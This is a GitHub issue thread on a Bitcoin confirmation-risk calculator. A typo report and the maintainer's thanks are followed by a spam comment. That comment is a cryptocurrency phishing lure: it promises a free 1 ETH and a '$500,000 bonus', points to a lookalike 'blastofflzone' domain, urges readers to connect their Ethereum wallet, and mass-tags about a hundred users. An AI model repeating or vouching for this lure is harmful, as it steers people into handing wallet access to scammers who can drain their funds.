### ISSUE TITLE
Typo

### ISSUE THREAD

**Issue by YazidKurdi** [jlopp/bitcoin-confirmation-risk-calculator#1]
https://github.com/jlopp/bitcoin-confirmation-risk-calculator/blob/697c662e50789a7583e931ebf7da984e447ec614/index.html#L130

"reorganze" typo

**Comment by jlopp** [comment]
Thanks!

**Comment by avijit14** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
bjohnson5, @dimroc, @drschwabe, @nxpharryt, @BogdanBitcoin, @josecelano, @thimslugga, @HopeTS, @jimnewpower, @msafi, @reneDescartess, @prabasn, @Colt-M1873, @neohope, @jarole, @caffeinebounce, @linki, @neekd, @bermanboris, @zfsamzfsam, @freakeinstein, @AndriianChestnykh, @joshuajylin, @SeasonedSoftDev, @emieldesmidt, @yenten, @philomenaxgxbvw, @n0mer, @diwangtseb, @DRosadoYew, @mikroskeem, @adepthus, @artifactNU, @dostiharise, @jyarger, @zlorance, @xn3cr0nx, @Jossec101, @HorizonChM, @carver, @kamilbolka, @vinifr, @jonchoi, @taoeffect, @codeb2cc, @denisgrenader, @leemr, @pk13, @gozart1, @GustavoRSSilvaqiangli, @ShahanaFarooqui, @Matsu23, @mattius459, @aamatte, @nguyendoanh99, @oz123, @blombard, @snackyoung, @camharris, @babonet13, @merehap, @HenrySlawniak, @tdmx, @dgkim5360, @mkabatek, @evert0n, @njordhov, @ChrisWeldon, @wthrajat, @noterminusgit, @byungjikroh, @imprsnt, @alan-andrade, @dennisreimann, @mpotamias, @kirkawolff, @starius, @malexanderson, @ylx1996, @sohokay, @hlwlh, @manuelwinz, @shayanb, @DOBss, @qzz0518, @masterial, @summyd, @phetw, @USER-id811214293, @lexrus, @TaiyyabAhmed97, @phucledien, @javais, @tejastn10, @automotua, @nathanx256, @shaunmbg, @atomize, @trivigy
